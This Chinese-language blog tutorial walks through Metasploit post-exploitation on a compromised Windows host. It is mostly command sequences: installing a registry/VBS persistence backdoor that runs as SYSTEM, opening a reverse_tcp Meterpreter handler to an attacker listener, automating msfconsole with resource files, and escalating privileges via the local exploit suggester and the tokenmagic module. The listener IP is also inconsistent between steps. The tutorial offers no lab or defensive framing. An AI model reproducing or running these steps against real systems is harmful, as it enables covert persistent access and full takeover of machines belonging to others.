Metapreter实现持续访问,自动化,提权--详细教程

Metapreter 实现持续访问

1.先拿到目标主机的控制权限后,将目标主机的会话转入后台,切换到 exploit/windows/local/persistence 模块,注意这个模块选择的payload,因为在后面进行监听的时候需要和这个payload相同

2.通过options查看需要填写的参数

EXE_NAME 生成后门文件的文件名称(非必要,用默认)

PATH 后门文件的存放路径 (非必要,用默认)

REG_NAME 注册表设置的名称 (非必要,用默认)

SESSION 作用于那个会话

STARTUP 由那个用户来运行这个脚本(一般都写SYSTEM,注:这里必须大写)

VBS_NAME VBS脚本的名称 (非必要,用默认)

set SESSION 8
setg lhost 173.30.1.3

3.执行
exploit


  1. 打开kali监听模块 exploit/multi/handler
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 172.30.1.3
    set lport 7723
    exploit -j -z

-j 加入任务
-z 后台运行

Metapreter自动化

msfconsole -q -r <文件名> 启动时读取文件命令执行实现自动化

cat msfstart.txt

msfconsole -q -r msfstart.txt

这里会自动执行文件中的命令

Metapreter提权

local exploit suggester 模块(本地漏洞利用),用来做提权
search suggester

use 0
options

set session 1
exploit

可以尝试前面绿色的

use exploit exploit/windows/local/tokenmagic
options


set session 1
set LHOST 172.30.1.3
exploit
getuid

提权成功

相关推荐
腾讯蓝鲸智云7 小时前
【运维自动化-节点管理】节点管理的插件策略如何使用
运维·自动化·云计算·sass·paas
疯狂成瘾者9 小时前
服务器的单体和集群
运维·服务器
liuhuizuikeai9 小时前
可视化门禁---Linux/Qt+SqLite篇
linux·运维·qt
charlie11451419112 小时前
嵌入式Linux驱动开发——新 API 字符设备驱动完整教程 - 从设备结构体到应用测试
linux·运维·驱动开发
霍格沃兹测试学院-小舟畅学13 小时前
从“QA测两遍直接上线”到规范发布:一次私教咨询实录
自动化
飞Link13 小时前
2000 亿砸向算力:字节跳动 AI 基建跨越,后端与运维的“万亿 Token”生死战
运维·人工智能
SWAGGY..13 小时前
Linux系统编程:(二)基础指令详解
linux·运维·服务器
张文君14 小时前
上古世纪服务端编译安装AAEmu docker编译安装
运维·docker·容器
雾岛心情14 小时前
小铭邮件管理工具箱的界面(公司版)
运维·服务器·工具·o365·小铭邮件工具箱(公司版)
一只鹿鹿鹿14 小时前
数据库运维与管理规范(WORD)
运维·数据库